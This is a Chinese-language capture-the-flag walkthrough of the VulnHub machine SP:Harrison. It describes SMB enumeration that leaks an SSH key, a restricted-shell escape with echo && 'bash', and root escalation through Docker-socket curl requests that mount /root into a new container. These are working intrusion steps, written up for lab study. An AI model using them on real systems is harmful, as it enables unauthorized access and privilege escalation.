vulnhub之SP:Harrison靶机

下载地址：‘https://www.vulnhub.com/entry/sp-harrison,302/’

环境：靶机放在virtualbox上运行，网卡模式

攻击机：kali Linux运行在VMware，注意网络模式选择桥接，并且桥接在virtualbox的虚拟网卡上

现在开始进入主题

首先使用netdiscover开启网络发现

发现了几个网段，因为靶机和我们是连接在同一张网卡，kali地址是192.168.163.0网段，那就上nmap这个工具

扫网段发现192.168.163.3这个机子是在vir上运行，靶机无疑。直接使用nmap -A 192.168.163.3 -p 1-65535 进行全扫描

有22，445端口

445 端口运行samba服务，是Linux下的一个共享服务，可以使用enum4linux 进行一个枚举

22端口运行ssh服务，并在扫描信息中发现了一个用户harrison，因为ssh算一个比较完善的服务，漏洞利用少，爆破也是不错的选择

使用enum4linux进行枚举，发现了一个共享文件夹Private

我们在使用smb客户端进看看是否是匿名共享，确实是匿名, -L   显示服务器端所分享出来的所有资源

直接连接smb的命令和ftp区别不大，ls一下文件发现了两个可以的.ssh目录可能存在密钥对，使我们ssh连接的时候使用私钥不用密码

flag.txt可能是我们这一关的终点站

下载到本地

查看内容，flag.txt经百度翻译为不会那么容易的。

id_rsa存私钥

authorized_keys里面存在着一份公钥，且有root字眼存在，不知道会不会是坑

使用ssh连接发现root使用不了私钥，我们前面扫描出一个用户搞好成功了,但是发现只能使用几个命令，受到限制

试试绕过，在次基础是新建一个shell终端进行绕过，最后成功了echo && 'bash'

echo 输出 &&与逻辑前面命令成功继续执行后面的所以shell就成功了

找到两个flag文件都不是，不过root下的flag有执行权限，应该是他，所以我们要进行提权

收集信息

uname -a # 查看内核/操作系统/CPU信息

cat /etc/issue，此命令也适用于所有的Linux发行版

得到几个有用的信息

找内核有没有漏洞，很不幸没有找到，可能是我的searchsploit太久没更新了，也有可能是这个版本还没有爆出漏洞，比竟这个靶机是5月份

上传LinEnum.sh

下载地址https://github.com/rebootuser/LinEnum.git

运行kali上的python形成一个简单的HTTP服务，记得放LinEnum脚本的地方最好在本地浏览器试一下

在靶机是属于wget下载脚本，运行，先给脚本可执行权限

查看一下suid(可以让调用者以文件拥有者的身份运行该文件)就是以root的权限运行

(Nmap Vim find Bash More Less Nano cp)

到这里我熟悉的就用完了，想了一下，还有docker,进去/run查看一下运行文件，发现了docker.sock

谷歌上搜了一会发现两篇文章

https://blog.fundebug.com/2017/04/17/about-docker-sock/

https://www.freebuf.com/articles/system/201793.html

本地命令好像是这样子，但是我们要新建一个容许来挂载/root，所以要改一下poc

试一下，

curl  -XPOST  -H 'Content-Type: application/json' --unix-socket /var/run/docker.sock  -d '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKey":"ctrl-p,ctrl-q","Mounts":[{"Type":"bind","Source":"/root/","Target":'/os_root'}]}'   http://localhost/containers/create

-XPOST 发送post请求

-h 添加请求头

Image 创造镜像名称

attach进入Docker容器，指定退出attach模式的快捷键序列，默认是CTRL+p CTRL-q

Cmd 执行的命令

Mounts 挂载 ，将root挂载在容器的os_root

--unix-socket 指定 unix socket 文件的地址 ,监听地址不是 IP:Port 而是 unix socket 的程序

curl --unix-socket /var/run/docker.sock http://localhost/images/json 获取所有的容器这个命令或许有用记下来

nc -U /var/run/docker.socket

nc不是脑残的缩写，是net cat的缩写。-U指明是unix socket

不知道传啥，然后又找到这个

改一下我们的poc

curl  -XPOST  -H 'Content-Type: application/json' --unix-socket /var/run/docker.sock  -d '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKey":"ctrl-p,ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/root/","Target":"/os_root"}]}'   http://localhost/containers/create

成功提权，root